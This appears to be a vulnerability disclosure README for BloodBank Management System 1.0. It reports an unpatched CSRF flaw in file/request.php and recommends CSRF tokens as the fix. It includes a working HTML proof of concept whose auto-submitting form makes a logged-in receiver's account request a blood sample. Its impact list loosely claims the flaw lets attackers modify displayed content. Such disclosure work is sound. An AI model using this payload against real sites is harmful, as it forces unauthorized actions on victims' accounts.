## **Affected Version:**
- **BloodBank Management System**: 1.0
## **Vulnerability Information:**
- **Vulnerability Type:** Cross Site Request Forgery (CSRF)
- **Severity:** HIGH
- **Status:** Unpatched
## **Vulnerable Endpoint:**
- **Path:** `file/request.php`
## **Vulnerability Description:**
There is a Cross Site Request Forgery on this endpoint `/file/request.php` which allows a remote user to initiate a `blood sample` request on the account of a `receiver` who is logged in, from the available blood sample of a selected hospital
Successful exploitation can lead to **unauthorized actions** on behalf of the victim. Additionally, this could be exploited by visiting malicious websites with the payload.
---
## **Proof of Concept (PoC):**
Below is an example of a **CSRF POC Attack** that initiates a `blood sample` request from a logged in `receiver's` account:
```html
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://localhost.local/bloodbank/file/request.php" method="POST" enctype="application/x-www-form-urlencoded">
<input name="bid" value="16">
<input name="hid" value="3">
<input name="bg" value="B-">
<input name="request" value="Request+Sample">
</form>
<script>
document.querySelector("form").submit();
</script>
</body>
</html>
```
---
## **Impact:**
- **Data Manipulation:** Attackers could modify the content displayed to users.
- **Reputational Damage:** Users may lose trust in the system due to malicious behavior.
---
## **Mitigation Recommendations:**
1. **Use CSRF Token** Implement mechanism to deter cross domain access or put `csrf tokens` in your request
---
[4.0K] /data/pocs/d0c8ef70526a4a0d2b89ea2fde9f546b98954fe7
└── [2.1K] README.md
0 directories, 1 file